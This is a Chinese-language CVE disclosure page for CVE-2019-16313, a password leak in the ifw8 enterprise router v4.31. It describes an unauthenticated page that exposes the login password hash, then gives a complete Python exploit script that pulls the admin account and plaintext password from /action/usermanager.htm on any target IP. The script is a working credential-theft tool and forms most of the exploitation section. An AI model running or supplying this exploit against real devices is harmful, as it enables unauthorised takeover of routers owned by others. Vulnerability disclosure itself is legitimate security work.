CVE中文申请站

CVE-2019-16313:蜂网互联企业级路由器v4.31密码泄露漏洞

一、漏洞摘要

漏洞名称: 蜂网互联企业级路由器v4.31密码泄露漏洞
上报日期: 2019-09-07
漏洞发现者: thr0cyte
产品首页: http://www.ifw8.cn/product.html?productCateId=1
软件链接: http://www.ifw8.cn/product.html?productCateId=1
版本: v4.31
CVE编号: CVE-2019-16313


二、漏洞概述

1.png
访问/index.htm?PAGE=web链接,此链接未授权访问(里面的操作需要认证):
2.png
选择web账号管理:
查看源代码即可获取到登录密码的哈希值:
3.png
解密哈希即可获得密码:
4.png
/login.html从此链接登录系统:
5.png


三、利用方法

exp代码如下:

from optparse import OptionParser
import requests
import json

def getpass(target):
    r = requests.get( target + '/action/usermanager.htm')
    #return r.text
    s=json.loads(r.text)
    s=str(s['rows'])
    s=s.replace("[","")
    s=s.replace("]","")
    s=s.replace("\'","\"")
    s2=json.loads(s)
    print("账号:"+s2['user']+",密码:"+s2['pwd']+"\n登录地址为:"+target+"/login.html")

def main():
    usage = "usage: python3 %prog -t 目标(格式:http://1.1.1.1)"
    parser = OptionParser(usage=usage)
    parser.add_option('-t', dest='target',type='string',help='目标ip')
    (options, args) = parser.parse_args()
    target = options.target
    if target:
        getpass(target)
if __name__ == "__main__":
    main()

6.png


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/311/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313
exploit-db:发布中